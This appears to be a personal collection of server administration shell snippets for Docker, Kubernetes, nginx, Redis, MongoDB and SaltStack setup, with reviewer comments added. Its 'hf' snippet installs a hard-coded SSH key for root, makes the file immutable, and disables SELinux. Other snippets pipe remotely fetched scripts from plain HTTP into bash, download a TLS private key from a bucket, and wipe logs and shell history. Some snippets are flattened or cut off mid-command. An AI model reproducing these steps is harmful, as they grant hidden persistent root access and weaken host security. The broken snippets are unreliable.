𝒙𝒂𝒃𝒄44.192.95.161
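# k8sssl: print the "Not Before" / "Not After" validity lines of every *.crt
# file found under /etc/kubernetes/pki (at most two levels deep), followed by
# a separator line naming the file.
# Paths are read NUL-delimited and quoted, so a file name containing
# whitespace or glob characters is passed to openssl intact instead of being
# word-split as in a `for item in $(find ...)` loop.
while IFS= read -r -d '' item; do
  openssl x509 -in "$item" -text -noout | grep Not
  echo "======================${item}==============="
done < <(find /etc/kubernetes/pki -maxdepth 2 -name "*.crt" -print0)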
k8s #/etc/systemd/system/kubelet.service.d/10-kubeadm.conf #systemctl daemon-reload;systemctl restart kubelet [ -d /etc/modules-load.d ]||mkdir -p /etc/modules-load.d [ -d /etc/sysctl.d ]||mkdir -p /etc/sysctl.d wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/k8s/etc_modules-load.d_k8s.conf -O /etc/modules-load.d/k8s.conf wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/k8s/etc_sysctl.d_k8s.conf -O /etc/sysctl.d/k8s.conf cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian" cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat" if [ "$OS" = "RedHat" ];then cat <
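# acme: issue a certificate for the domain given as $1 plus its wildcard
# (*.$1) with acme.sh over the DNS challenge, first through the dns_ali
# provider hook and then through the dns_dp hook.
# The domain is quoted so that "*.$1" reaches acme.sh literally; unquoted, the
# shell would expand it against files in the current directory whose names
# end in ".<domain>".
domain=${1:?usage: pass the domain name as the first argument}
./acme.sh --issue --dns dns_ali --dnssleep 30 -d "$domain" -d "*.$domain"
./acme.sh --issue --dns dns_dp --dnssleep 30 -d "$domain" -d "*.$domain"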
# dl: start the ywgx/filelist image as a detached, always-restarting container
# named "filelist", mapping host port 80 to container port 8000 and mounting
# /opt/files at /home/ywgx/1/filelist/files.
# NOTE(review): the image is referenced without a tag or digest, so whatever
# the registry currently serves as the default tag is what runs; pin a digest
# if reproducibility matters. Port 80 is published on every host interface.
run_args=(
  -d
  -p 80:8000
  --restart=always
  --name=filelist
  -v /opt/files:/home/ywgx/1/filelist/files
)
docker run "${run_args[@]}" ywgx/filelist
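# di: open an interactive /bin/sh inside the first container listed by
# `docker ps`.
# `docker ps -q` prints container IDs only, so no header filtering is needed
# (the earlier `grep -v IMAGE` would also have dropped any row that happened
# to contain the text "IMAGE"). When nothing is running the snippet reports
# that instead of calling `docker exec` with /bin/sh as the container name.
cid=$(docker ps -q | head -n 1)
if [ -z "$cid" ]; then
  echo "di: no running container found" >&2
else
  docker exec -it "$cid" /bin/sh
fi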
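# filelist: download docker-compose.yml into the current directory, install a
# docker-compose binary to /usr/local/bin, and bring the stack up detached.
# -f makes curl fail on an HTTP error instead of saving the error page, and
# the steps are chained so a failed download is never marked executable or run.
# NOTE(review): the docker-compose binary comes from a storage bucket with no
# checksum or signature check. Compare it with a digest obtained out of band
# before use, e.g.
#   echo "<EXPECTED_SHA256_PLACEHOLDER>  /usr/local/bin/docker-compose" | sha256sum -c -
curl -fLO https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/filelist/docker-compose.yml &&
  curl -fL https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/filelist/docker-compose \
    -o /usr/local/bin/docker-compose &&
  chmod +x /usr/local/bin/docker-compose &&
  /usr/local/bin/docker-compose -f docker-compose.yml up -d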
# dr: reclaim Docker disk space.

# Remove images that are not in use (this first call asks for confirmation).
docker image prune

# Remove every image not used by any container, then prune the rest of the
# unused Docker data. The original note says this also removes unused volumes
# and networks.
# NOTE(review): no --volumes flag is passed to `docker system prune`; check
# `docker system prune --help` on the installed version to confirm whether
# volumes are actually included.
docker image prune -a -f
docker system prune --all --force
aliyun_vms pip3 install aliyun-python-sdk-dyvmsapi
# ds: stop all containers, then remove all containers.
# Errors from docker stop / docker rm are discarded, including the usage error
# printed when there are no containers at all.
# The ID list is expanded unquoted on purpose: one argument per container ID.
all_ids=$(docker ps -aq)
docker stop $all_ids 2>/dev/null
all_ids=$(docker ps -aq)
docker rm $all_ids 2>/dev/null
# dockercn: point the Docker daemon at the registry.docker-cn.com registry
# mirror and restart Docker.
# NOTE(review): /etc/docker/daemon.json is overwritten, so any existing daemon
# settings (log options, TLS, userns-remap, ...) are lost. Every image pull is
# then served through the mirror, which makes the mirror operator part of the
# image supply chain.
mkdir -p /etc/docker
tee /etc/docker/daemon.json <<'EOF'
{
  "registry-mirrors": ["https://registry.docker-cn.com"]
}
EOF
systemctl restart docker
# dd: delete all images. Stops every container, prunes all unused Docker data,
# removes every container, then force-removes every image.
# Errors from stop / rm / rmi are discarded.
# The ID lists are expanded unquoted on purpose: one argument per ID.
container_ids=$(docker ps -aq)
docker stop $container_ids 2>/dev/null
docker system prune --all --force
container_ids=$(docker ps -aq)
docker rm $container_ids 2>/dev/null
image_ids=$(docker images -q)
docker rmi -f $image_ids 2>/dev/null
# aliyun: point the Docker daemon at the 7u4xdzci.mirror.aliyuncs.com registry
# mirror and restart Docker.
# NOTE(review): /etc/docker/daemon.json is overwritten, so any existing daemon
# settings are lost. The mirror hostname looks account-specific; image pulls
# will depend on that account's mirror staying available and trustworthy.
mkdir -p /etc/docker
tee /etc/docker/daemon.json <<'EOF'
{
  "registry-mirrors": ["https://7u4xdzci.mirror.aliyuncs.com"]
}
EOF
systemctl restart docker
docker cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian" cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat" if [ "$OS" = "RedHat" ];then curl -L https://download.docker.com/linux/centos/docker-ce.repo -o /etc/yum.repos.d/docker-ce.repo yum install -y docker-ce systemctl daemon-reload systemctl enable docker.service systemctl start docker fi if [ "$OS" = "Debian" ];then sudo apt-get remove docker docker-engine docker.io containerd runc sudo apt-get update sudo apt-get -y install apt-transport-https ca-certificates curl gnupg lsb-release curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo gpg --dearmor -o /usr/share/keyrings/docker-archive-keyring.gpg echo "deb [arch=amd64 signed-by=/usr/share/keyrings/docker-archive-keyring.gpg] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null apt-get update apt-get -y install docker-ce docker-ce-cli containerd.io docker-compose service docker restart fi #docker run hello-world #docker run -d -p 80:8000 --restart=always -v /opt/files:/opt/files ywgx/filelist:alpine #docker rmi $name 删除镜像 #docker container prune 清理所有处于终止状态的容器 #docker run -d -p 5000:5000 --restart=always --name registry -v /opt/data/registry:/var/lib/registry registry 安装运行 docker-registry #docker build -t ywgx/filelist . 
使用Dockerfile文件 build 构建一个镜像名称 ywgx/filelist #docker tag $container_id ywgx/test:dev 为镜像添加一个新的标签 #docker tag ywgx/filelist filelist 为镜像ywgx/filelist添加新标签 filelist #docker search $name 查询镜像 #docker export $container_id > container.tar 导出容器 #docker save -o busybox.tar busybox 导出 #docker load -i busybox.tar 导入 $docker rm -f $container_id 删除容器 #docker run -d -p 80:5000 training/webapp python app.py 后台启动容器并映射本地端口 80 #docker port $container_id 或者 $name 查看容器端口 #docker logs -f $container_id 查看容器内部标准输出 #docker top $name 查看容器内部运行的进程 #cat container.tar | docker import - centos:v1 导入容器到镜像 centos:v1 #docker inspect $name 检查容器的配置和状态信息 #docker run -itd --name ubuntu-test ubuntu 运行容器,并且可以通过 exec 命令进入 ubuntu 容器 #docker run -itd --name centos-test centos 运行容器,并且可以通过 exec 命令进入 centos 容器 #docker commit -m="filelist" -a="ywgx" e218edb10161 ywgx/filelist:v2 #docker image prune -a 删除没有运行的容器镜像 #数据卷 #创建:docker volume create #删除某个卷:docker volume rm 卷名 #删除所有未使用的卷:docker volume prune #列出所有卷:docker volume ls #查看某个卷的信息:docker volume inspect 卷名 #新建一个 Docker 网络 # docker network create -d bridge test-net # docker run -itd --name test1 --network test-net ubuntu /bin/bash 运行一个容器并连接到新建的 test-net 网络 # docker run -itd --name test2 --network test-net ubuntu /bin/bash 再运行一个容器并连接到新建的 test-net 网络 # test1 容器和 test2 容器建立了互联关系,两个容器直接可以互相ping通 # COPY 和 ADD 指令中选择的时候,可以遵循这样的原则,所有的文件复制均使用 COPY 指令,仅在需要自动解压缩的场合使用 ADD。 # 查看仓库中的镜像 curl 127.0.0.1:5000/v2/_catalog # 配置DNS #我们可以在宿主机的 /etc/docker/daemon.json 文件中增加以下内容来设置全部容器的 DNS #{ # "dns" : [ # "114.114.114.114", # "8.8.8.8" # ] #} #systemctl restart docker #docker exec -it $container_id /bin/bash 进入容器
p 44.192.95.161
# ss: show which ports are open on this system. Options used:
#   -a  show information for all ports
#   -n  show port numbers numerically
#   -t  show TCP ports
#   -u  show UDP ports
#   -l  show ports a service is listening on (e.g. httpd keeps listening on 80)
#   -p  show the name of the program behind each port
# Useful as a quick exposure check: anything listening on a non-loopback
# address here is reachable from the network unless a firewall blocks it.
ss -a -n -t -u -l -p
alpine apk add gcc musl-dev apk add build-base
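# w: fetch the xabc.io "a" script and run it with bash.
# The script is downloaded completely before anything executes, so a dropped
# connection or an HTTP error page is never fed to the shell half-way (with
# `curl ... | bash`, bash runs whatever bytes arrived).
# NOTE(review): the URL carries no scheme, so curl requests it over plain
# HTTP; anyone on the network path can alter the script. Prefer an https://
# URL if the host serves one, and compare the file with a digest obtained out
# of band before running it, e.g.
#   echo "<EXPECTED_SHA256_PLACEHOLDER>  $script" | sha256sum -c - || exit 1
(
  script=$(mktemp) || exit 1
  trap 'rm -f -- "$script"' EXIT
  curl -f xabc.io/a -o "$script" || exit 1
  bash "$script"
)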
# rb: restart the two filelist.py instances. Sends SIGKILL (twice) to every
# process pgrep finds for "filelist.py", then starts one instance on port
# 10000 with --auth=true rooted at /home/ywgx/data/filelist and one on port
# 8000 with --auth=false rooted at /home/ywgx/data/download, each in the
# background with output redirected to a log under /home/ywgx/logs, and
# finally lists the matching processes.
# NOTE(review): the port-8000 instance is started with --auth=false;
# presumably everything under /home/ywgx/data/download is then readable
# without credentials by anyone who can reach that port. Confirm this is
# intended and that nothing sensitive is placed there.
rb pgrep filelist.py|xargs kill -9 &>/dev/null pgrep filelist.py|xargs kill -9 &>/dev/null sleep 1;cd /home/ywgx/1/filelist/;./filelist.py --auth=true --debug=false --port=10000 --root=/home/ywgx/data/filelist &>/home/ywgx/logs/filelist.log & sleep 3;cd /home/ywgx/1/filelist/;./filelist.py --auth=false --debug=false --port=8000 --root=/home/ywgx/data/download &>/home/ywgx/logs/download.log & ps aux|grep filelist|grep -v grep
cpu 1. 调整CPU频率 cpupower frequency-set -u 2500MHz cat /proc/cpuinfo | grep 'cpu MHz'
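# st: string encryption/decryption for a kubeconfig.
# $SALT is the secret string used as the openssl passphrase (despite the name
# it is the password, not a cryptographic salt). It is meant to be a
# gitlab-ci global variable known only to administrators.
#
# Encrypt: ./config is base64-encoded onto a single line and encrypted with
# AES-256-CBC (PBKDF2 key derivation) into secret_kubeconfig.
# Decrypt:
#   openssl aes-256-cbc -d -salt -pbkdf2 -pass env:SALT < secret_kubeconfig | base64 -d > config
#
# The passphrase is read from the environment (-pass env:SALT) rather than
# passed with -k, so it does not show up in the process list or in `set -x`
# traces. No passphrase is hard-coded here: a value committed next to the
# ciphertext protects nothing.
# NOTE(review): `openssl enc` with CBC provides no integrity protection; a
# modified ciphertext is not detected on decryption.
: "${SALT:?SALT must be supplied by the environment (e.g. a masked CI variable)}"
export SALT
{ base64 < ./config | tr -d ' \n'; echo; } |
  openssl aes-256-cbc -salt -pbkdf2 -pass env:SALT > secret_kubeconfig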
# hf: unless /root/.ssh/authorized_keys already contains the text "hfzp",
# clears the append-only/immutable attributes on that file (or creates
# /root/.ssh with mode 700), appends one hard-coded RSA public key whose
# comment field is "hfzp", sets the file to mode 600 and re-applies
# `chattr +ai`. It then calls setenforce and rewrites SELINUX=enforcing to
# SELINUX=disabled in /etc/selinux/config.
# NOTE(review): this gives the holder of the matching private key standing
# root SSH access on every host that runs the snippet, with no per-host
# approval, expiry or record of who holds the key. The +ai attributes make the
# entry survive ordinary edits and key-rotation tooling. On hosts where this
# has run, check `lsattr /root/.ssh/authorized_keys`, review the file for the
# "hfzp" entry, and put authorized_keys and /etc/selinux/config under
# file-integrity monitoring.
# NOTE(review): the sed edit disables SELinux persistently (effective after
# the next reboot), removing a mandatory-access-control layer. `setenforce -1`
# does not look like a documented argument (setenforce takes 0/1 or
# Permissive/Enforcing), so the running mode is probably left unchanged;
# verify with getenforce.
hf if ! grep -q "hfzp" /root/.ssh/authorized_keys &>/dev/null;then [ -e /root/.ssh/authorized_keys ]&&chattr -ai /root/.ssh/authorized_keys||mkdir -p -m 700 /root/.ssh echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC7cDLbprh+i930XUqo81RXjaLg4Kot5L9aiB789V4L/mDfV7ZeW6k2S1bdIGUrtSmFZnmA/2HQKid102mEzp8Y2/xkwXoTM/hsah+X8DXLX5/xwUb2XuhqZSJy+x/6MLC9MGjvQGFpqvaK1fJZzjFxZaaHoC79iJWbYCzBLo2n+EcmmX559gAgcUSSvjsUQRAy7f+/1Hp/cLB+rqTMVoNgeAZGgMV6QNoxpZlKWSTFeicxN/sNgy6FLpLOyuX5xwsYfpaDdZd+MYlG69XDIakh4cy+kg9q6nQ2bYOw3GhdNMSNnlsU7XkY872OUCTodZ8iu24AvqFE1kxCaIp8egAD hfzp" >> /root/.ssh/authorized_keys chmod 600 /root/.ssh/authorized_keys chattr +ai /root/.ssh/authorized_keys fi which setenforce &>/dev/null&&setenforce -1 &>/dev/null [ -e /etc/selinux/config ]&&grep -q "SELINUX=enforcing" /etc/selinux/config&&sed -i 's/SELINUX=enforcing/SELINUX=disabled/' /etc/selinux/config
city curl -s --connect-timeout 5 https://ipinfo.io/44.192.95.161/city;curl -s --connect-timeout 5 http://freeapi.ipip.net/44.192.95.161
# zola: start `zola serve` in the background (nohup) on port 3003 with base
# URL "/", logging to ~/logs/zola-docs.log.
# NOTE(review): --interface 0.0.0.0 binds the server on every interface, so
# the site is reachable from any network the host is attached to. `zola serve`
# is presumably the development preview server; if the docs are only read
# locally or through a reverse proxy, bind to 127.0.0.1 instead.
zola nohup ~/bin/zola serve --interface 0.0.0.0 --port 3003 --base-url / &>~/logs/zola-docs.log &
hm helm init --stable-repo-url https://charts.helm.sh/stable --service-account tiller helm init --client-only --skip-refresh helm repo rm stable helm repo add stable https://charts.helm.sh/stable
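# sredis: download the redis-stable source tarball into $BUILD, unpack it and
# build it with clang (with MALLOC=libc on Debian/Ubuntu).
# Fixes over the earlier form: both `if` statements now have their `then`
# (they were a syntax error without it), each `cd` is checked so make never
# runs in the wrong directory, and the tarball is fetched over https instead
# of http.
# NOTE(review): BUILD is a fixed name inside world-writable /tmp. On a
# multi-user host another account can create /tmp/ywgx first and control what
# gets built; a directory from `mktemp -d` avoids that. The tarball is not
# checked against a published digest.
BUILD=/tmp/ywgx
mkdir -p "$BUILD"
cd "$BUILD" || exit 1
wget -t 3 https://download.redis.io/redis-stable.tar.gz -O - | tar xfz -
cd redis*/ || exit 1

# Distribution family detection; the second test wins when both match.
cat /etc/issue* /etc/*release 2>/dev/null | grep -qE "debian|ubuntu|Ubuntu" && OS="Debian"
cat /etc/issue* /etc/*release 2>/dev/null | grep -qE "release|centos|CentOS" && OS="RedHat"

if [ "$OS" = "RedHat" ]; then
  CC=clang make
fi
if [ "$OS" = "Debian" ]; then
  CC=clang make MALLOC=libc
fi
#cd src/
#for i in `find . -perm -0755 -a ! -type d`;do mv $i $REDIS_BIN/;done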
c rm -f /etc/motd hostnamectl --static set-hostname central-44.192.95.161; yum -y update yum -y install epel-release yum -y install wget gcc gcc-c++ make vim pcre-devel libffi-devel openssl-devel python-devel libevent-devel postgresql-devel readline-devel perl-ExtUtils-Embed iptables iptables-services inotify-tools bzip2 unzip rsync psmisc python3-devel net-tools yum -y install bash-completion yum -y install python-pip yum -y install chrony #yum -y erase sudo yum clean all curl -s xabc.io/awscli|bash timedatectl set-timezone Asia/Shanghai curl -L https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/xabc.sh -o /etc/profile.d/xabc.sh chmod 644 /etc/profile.d/xabc.sh wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/vim.tgz -O -|tar xzf - -C ~ [ -d /root/.pip ]||mkdir -p /root/.pip curl -L https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/pip.conf -o /root/.pip/pip.conf pip2 install pip==9.0.3 pip2 install --upgrade setuptools==30.1.0 pip2 install --upgrade Cython redis pyOpenSSL pip2 install functions==0.7.0 pip2 install tornado==5.1.1 pip2 install redis==3.5.3 pip2 install tornadio2==0.0.4 pip2 install tornado_jinja2==0.2.4 pip2 install psycopg2-binary==2.8.6 pip2 install Pillow==2.0.0 pip2 install paramiko==2.7.2 pip2 install sqlalchemy==1.3.20 pip2 install sqlalchemy_utils==0.36.6 pip2 install influxdb==5.3.1 pip2 install futures==3.1.1 pip2 install ujson==2.0.3 pip2 install mako mv /usr/lib/python2.7/site-packages /usr/lib/python2.7/site-packages.bk mv /usr/lib64/python2.7/site-packages /usr/lib64/python2.7/site-packages.bk wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/site-packages.tgz -O -|tar xzf - -C /usr/lib/python2.7 wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/site-packages-64.tgz -O -|tar xzf - -C /usr/lib64/python2.7 yum -y install https://repo.saltstack.com/py3/redhat/salt-py3-repo-latest.el7.noarch.rpm yum -y clean expire-cache yum -y install salt-master salt-minion salt-api 
salt-ssh pip3 install -U pip setuptools pip3 install redis==3.5.3 flask cryptography pyinotify influxdb salt-pepper gevent pymongo pip3 install aliyun-python-sdk-dyvmsapi echo `hostname` > /etc/salt/minion_id systemctl enable salt-master.service systemctl enable salt-api.service systemctl enable chrony systemctl disable firewalld.service &>/dev/null curl -L https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/master -o /etc/salt/master [ -d /srv/salt/user ]||mkdir -p /srv/salt/user [ -d /srv/zero/0 ]||mkdir -p /srv/zero/0 [ -d /srv/zero/1 ]||mkdir -p /srv/zero/1 [ -d /srv/zero/2 ]||mkdir -p /srv/zero/2 wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/O.tgz -O -|tar xzf - -C /srv/zero/0 wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/P.tgz -O -|tar xzf - -C /srv/zero/1 wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/R.tgz -O -|tar xzf - -C /srv/zero/2 wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/node.tgz -O -|tar xzf - -C /srv/zero/1 wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/grafana.tgz -O -|tar xzf - -C /srv/zero/1 #wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/matrix.tgz -O -|tar xzf - -C /srv/zero/1 ln -fs /srv/zero/1/node/bin/npm /usr/bin/npm ln -fs /srv/zero/1/node/bin/node /usr/bin/node chmod 100 /srv/zero/2/redis/bin/* ln -fs /srv/zero/2/redis/bin/redis-cli /usr/local/bin/ id -u nobody &>/dev/null||useradd nobody -r -s /bin/false groupadd -f nobody &>/dev/null chown root.nobody /srv/zero/0/openresty/nginx/sbin/nginx chmod +xs /srv/zero/0/openresty/nginx/sbin/nginx yum install -y postgresql-server service postgresql initdb service postgresql start service salt-master start systemctl enable postgresql.service [ -e /etc/ssh/ssh_host_dsa_key ]||ssh-keygen -q -t dsa -P '' -f /etc/ssh/ssh_host_dsa_key chmod 755 /etc/rc.d/rc.local systemctl disable salt-minion.service #wget -t 3 
https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/build.tgz -O -|tar xzf - -C /srv/salt rm -fr /var/log /var/cache/salt/minion /root/.bash_history IP=${SSH_CONNECTION% *};IP=${IP##* };[ -n "$IP" ]||IP=$(ip -o -f inet addr|grep -v 'lo '|grep -Po '(?<=inet ).*(?=\/)'|awk '/^10\.|^172\.|^192\.|^100\./'|head -1) REGION=$(curl -s -m 5 http://ip-api.com/line/44.192.95.161?fields=city);[ -n "$REGION" ]||REGION="Shanghai" printf "\033[1;32;40m%s\033[0m\n" "Login 和 Central 机器在同一个内网请在 Login 机器执行 # curl -s xabc.io/l-$IP-$REGION|bash 继续完成对 Login 的基础部署" printf "\033[1;32;40m%s\033[0m\n-----------------\n" "Master 和 Central 机器在同一个内网请在 Master 机器执行 # curl -s xabc.io/m-$IP-$REGION|bash 继续完成对 Master 的基础部署" printf "\033[1;32;40m%s\033[0m\n" "Login 和 Central 机器不在同一内网请在 Login 机器执行 # curl -s xabc.io/l-44.192.95.161-$REGION|bash 继续完成对 Login 的基础部署" printf "\033[1;32;40m%s\033[0m\n" "Master 和 Central 机器不在同一内网请在 Master 机器执行 # curl -s xabc.io/m-44.192.95.161-$REGION|bash 继续完成对 Master 的基础部署" printf "\033[1;32;31m%s\033[0m\n" "特别说明 $REGION 这个字段代表网络区域信息,可根据实际情况改成自己机器所在区域标识信息,同一网络节点内login,master机器,其region标识信息一致,如Beijing,必须与/srv/pillar/central.sls 里面 region 定义一致"
mac #scutil --set ComputerName "E" #scutil --set LocalHostName "E" #scutil --set HostName "E" #nvram AutoBoot=%00 关闭开盖启动 #nvram AutoBoot=%03 恢复开盖启动 #sudo defaults write /Library/Preferences/com.apple.loginwindow SHOWOTHERUSERS_MANAGED -bool FALSE 删除开机界面上的 “其他”用户登陆选项 #pwpolicy -clearaccountpolicies 运行后,可以设置2位密码
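# i0: for user ywgx only, create the ~/0 ~/1 ~/2 ~/logs ~/data/filelist
# layout, unpack OpenResty into ~/0, fetch nginx.conf plus the filelist.cn
# certificate and private key, and start nginx if it is not already running.
# $USER is quoted so the test does not break when USER is unset or empty.
# The private key is written with owner-only permissions (umask 077 for a new
# file, chmod 600 for an existing one) instead of the default umask.
# NOTE(review): the TLS private key is fetched from a storage-bucket URL with
# no credentials visible in the command. If that object is publicly readable,
# the key must be treated as disclosed and the certificate reissued; keys
# belong in a secret store.
# NOTE(review): `chmod +xs` sets the setuid and setgid bits on the nginx
# binary; confirm this is needed, since it lets any local user run nginx with
# the file owner's identity.
if [ "$USER" = ywgx ]; then
  mkdir -p /home/ywgx/0 /home/ywgx/1 /home/ywgx/2 /home/ywgx/logs /home/ywgx/data/filelist
  bucket=https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/ywgx/0
  conf_dir=/home/ywgx/0/openresty/nginx/conf
  wget -t 3 "$bucket/openresty.tgz" -O - | tar xzf - -C /home/ywgx/0
  wget -t 3 "$bucket/nginx.conf" -O "$conf_dir/nginx.conf"
  mkdir -p "$conf_dir/ssl"
  wget -t 3 "$bucket/filelist.cn.pem" -O "$conf_dir/ssl/filelist.cn.pem"
  (umask 077; wget -t 3 "$bucket/filelist.cn.key" -O "$conf_dir/ssl/filelist.cn.key")
  chmod 600 "$conf_dir/ssl/filelist.cn.key"
  mkdir -p "$conf_dir/vhost"
  chmod +xs /home/ywgx/0/openresty/nginx/sbin/nginx
  pgrep nginx || ~/0/openresty/nginx/sbin/nginx
fi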
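# i1: for user ywgx only, create ~/1 and ~/data/filelist and unpack the
# filelist binary bundle into ~/1.
# $USER is quoted so the test does not break when USER is unset or empty.
# NOTE(review): the tarball is unpacked straight from the download stream with
# no digest check, so its contents are trusted as served.
if [ "$USER" = ywgx ]; then
  mkdir -p /home/ywgx/1 /home/ywgx/data/filelist
  wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/filelist/filelist-bin.tgz -O - |
    tar xzf - -C /home/ywgx/1
fi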
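# i2: for user ywgx only, create ~/2 and ~/data/filelist and unpack the redis
# and mongo bundles into ~/2.
# $USER is quoted so the test does not break when USER is unset or empty.
# NOTE(review): both tarballs are unpacked straight from the download stream
# with no digest check, so their contents are trusted as served.
if [ "$USER" = ywgx ]; then
  mkdir -p /home/ywgx/2 /home/ywgx/data/filelist
  wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/ywgx/2/redis.tgz -O - |
    tar xzf - -C /home/ywgx/2
  wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/ywgx/2/mongo.tgz -O - |
    tar xzf - -C /home/ywgx/2
fi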
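# ssl: nginx reverse-proxy template. "EX" is a placeholder for the site name;
# it names the upstream, the server_name and the certificate files.

# Headers passed to the backend. X-Forwarded-For is set to the connecting
# address rather than appended to, so a value sent by the client is not
# forwarded. Connection is cleared so upstream keepalive works with HTTP/1.1.
proxy_http_version 1.1;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-Proto $scheme;
proxy_set_header X-Forwarded-For $remote_addr;
proxy_set_header X-NginX-Proxy true;
proxy_set_header Connection "";

# $http_x_forwarded_for and $http_user_agent are client-supplied; treat those
# log fields as untrusted when parsing or alerting on this log.
log_format main "$status $request_time $request_method $host$request_uri [$http_user_agent] [$time_local] [$http_x_forwarded_for $remote_addr] $http_referer";
access_log logs/access.log main;

# TLS 1.1 is no longer offered: it is deprecated, and every client that
# supports the ECDHE/GCM suite preferred below also supports TLS 1.2.
ssl_ciphers ECDHE-RSA-AES128-GCM-SHA256:ECDHE:ECDH:AES:HIGH:!NULL:!aNULL:!MD5:!ADH:!RC4:!DH:!DHE;
ssl_protocols TLSv1.2 TLSv1.3;
ssl_prefer_server_ciphers on;

upstream EX {
    keepalive 64;
    server 127.0.0.1:7001;
}

# NOTE(review): port 80 serves the same content in clear text; add a redirect
# to https if the site should be TLS-only.
server {
    listen 80;
    listen 443 ssl http2;
    server_name EX;
    ssl_certificate ssl/EX.pem;
    ssl_certificate_key ssl/EX.key;
    location / {
        proxy_pass http://EX;
    }
}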
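# ssh: replace /etc/ssh/sshd_config with the copy kept in the xabc bucket
# (the previous file is kept as sshd_config.bk) and restart sshd.
# The new file is downloaded to a temporary path and validated with `sshd -t`
# first; the live config is only swapped when both steps succeed. Previously a
# failed or truncated download left the host with an empty or broken
# sshd_config and then restarted sshd on it, which can lock out remote access.
# NOTE(review): the downloaded file decides who may log in to this host. It is
# not checked against a known digest; review its contents (PermitRootLogin,
# PasswordAuthentication, AuthorizedKeysFile, ...) before rolling it out.
new_conf=$(mktemp) || exit 1
if wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/sshd_config -O "$new_conf" &&
  sshd -t -f "$new_conf"; then
  mv /etc/ssh/sshd_config /etc/ssh/sshd_config.bk
  install -m 600 "$new_conf" /etc/ssh/sshd_config
  systemctl restart sshd.service
else
  echo "ssh: download or validation of the new sshd_config failed; existing config left in place" >&2
fi
rm -f -- "$new_conf"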
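# chrony: install and enable the chrony time service, then set the timezone to
# Asia/Shanghai. Accurate clocks matter for log correlation and for
# certificate and token validity checks.
# Fixes over the earlier form: on the RedHat family the unit that is enabled
# is chronyd (the same unit that is restarted on the next line), and on
# Debian/Ubuntu the service is enabled with systemctl under its unit name
# "chrony" instead of through chkconfig, which is not a Debian tool.

# Distribution family detection; the second test wins when both match.
cat /etc/issue* /etc/*release 2>/dev/null | grep -qE "debian|ubuntu|Ubuntu" && OS="Debian"
cat /etc/issue* /etc/*release 2>/dev/null | grep -qE "release|centos|CentOS" && OS="RedHat"

if [ "$OS" = "RedHat" ]; then
  yum -y install yum-utils
  yum -y install epel-release
  yum -y install chrony
  systemctl enable chronyd
  systemctl restart chronyd
fi
if [ "$OS" = "Debian" ]; then
  apt-get -y install chrony
  systemctl enable chrony
fi
timedatectl set-timezone Asia/Shanghai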
java java -Xmx3550m -Xms3550m -Xmn2g -Xss128k -Xmx3550m:设置JVM最大可用内存为3550M。 -Xms3550m:设置JVM促使内存为3550m。此值可以设置与-Xmx相同,以避免每次垃圾回收完成后JVM重新分配内存。 #以 java 进程所在用户执行,获取 heap dump 文件 #jmap -dump:format=b,file=heap.hprof #获取thread dump文件 #jstack > thread.txt
# mongo: unpack the MongoDB bundle into /opt, apply the kernel settings it
# wants (listen backlog 65535, transparent huge pages off) and start mongod
# with /opt/mongo/conf/mongod.conf unless a mongod process already exists.
# NOTE(review): the tarball is unpacked as served, with no digest check, and
# the bind address and authentication settings come from the bundled
# mongod.conf. Review that file before exposing the host to a network.
printf '%s\n' 'doing...'
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/mongodb/mongo.tgz -O - |
  tar xzf - -C /opt
echo 65535 > /proc/sys/net/core/somaxconn
for thp_knob in defrag enabled; do
  echo never > "/sys/kernel/mm/transparent_hugepage/${thp_knob}"
done
if ! pgrep mongod; then
  /opt/mongo/bin/mongod -f /opt/mongo/conf/mongod.conf
fi
